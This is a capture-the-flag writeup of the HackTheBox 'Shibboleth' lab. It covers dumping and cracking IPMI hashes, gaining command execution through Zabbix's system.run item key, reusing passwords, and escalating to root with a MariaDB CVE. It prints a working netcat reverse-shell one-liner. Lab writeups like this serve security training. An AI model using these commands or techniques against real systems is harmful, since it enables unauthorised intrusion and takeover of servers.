Hello everyone, in this post I will be sharing my writeup for HTB-Shibboleth which was medium difficulty linux box, starting with nmap scan the only port that was open was port 80 on which apache was running and few UDP ports. Checking the web server it was having a template and there wasn’t any interesting there, enumerating for subdomain monitor.shibboleth.htb
on which zabbix was hosted, futher scanning for UDP ports revealed that port 623 was open thourgh which we were able to dump IPMI hash which gave access to zabbix as an administrator. Being in the zabbix dashboard we were able to get a reverse shell by injection commands in item values through zabbix agent. After getting a shell we were able to escalate our privileges by password re use (using the zabbix admin password ) on ipmi-svc
which had permissons to read zabbix database password, logging into mariadb we can see the version number which was vulnerable to CVE-2021–27928 a command execution vulnerability giving as a reverse shell as root user.
NMAP
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb
PORT 80 (HTTP)
On the web server we see a html template page
We can check the source which reveals that it’s a theme so no point in enumerating here, from the nmap scan it did show us that it was redirecting to a domain name so let’s try to run wfuzz
to bruteforce for subdomains
Here it gives us there names, and these all are the same
If we hover over the help
link , it will show us that it's using version 5 of zabbix
, which is a tool for monitoring the network and ,virtual machines and other services running. Searching for exploits was a rabbit hole here as it was reported that zabbix 5.x is vulnerable to blind sqli but there wasn't any exploits publicily available.
I went back to scanning the machine and scanend for UDP
ports
nmap -p 1-1000 -sU --min-rate 5000 10.129.231.205 -vv
PORT STATE SERVICE REASON
45/udp closed mpm port-unreach ttl 63
179/udp closed bgp port-unreach ttl 63
243/udp closed sur-meas port-unreach ttl 63
422/udp closed ariel3 port-unreach ttl 63
459/udp closed ampr-rcmd port-unreach ttl 63
623/udp open asf-rmcp udp-response ttl 63
892/udp closed unknown port-unreach ttl 63
This showed port 623 which was opened and was running IPMI
Intelligent Platform Management Interface , which is used for controlling and managing hardware services. There was a metasploit module available that can dump HMAC-SHA1
hashes, so using the module use auxiliary/scanner/ipmi/ipmi_dumphashes
And we can now crack this hash using hashcat
Foothold
To get a foolthold , we can run shell commands through Zabbix agent, in order to do this first we’ll need to go to Configuration
and select Hosts
Next select the hostname ,which is shibboleth.htb
, after selecting the hostname , navigate to items
Click on create new item
When adding a new item , in the key
field to run command we need to input system.run["shell command"]
also change type of information to text
At the bottom , we can see a button Test
to check our command
So we have command execution here , now we need to get a reverse shell from here
system.run["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 2222 >/tmp/f",nowait]
We are specifying nowait
here so it does not close the process
Stabilizing the reverse shell so we may have a tty shell
Privilege Escalation (ipmi-svc)
I ran sudo -l
to see if there was any thing this user can run as a different user or as root but we need a password , I tried the zabbix admin password but it failed
We can see another user named ipmi-svc
, let's try the password that we found for this user
And this worked , we can find the database creds from /etc/zabbix/zabbix_server.conf
## Privilege Escalation (root)
After logging in with mysql , it was using Mariadb
which was using 10.3.25
version, so I searched for if there was any exploit for this version and it returned with a command execution exploit
So first we have to generate a shared library file which can be used in any program at run time , transfer that on the target machine
Start the netcat listener , and login in with mysql user and executing the shared library
References
- https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes/
- https://hashcat.net/wiki/doku.php?id=example_hashes
- https://subscription.packtpub.com/book/cloud-and-networking/9781800202238/2/ch02lvl1sec20/using-zabbix-preprocessing-to-alter-item-values
- https://www.zabbix.com/forum/zabbix-help/21803-system-run-syntax
- https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html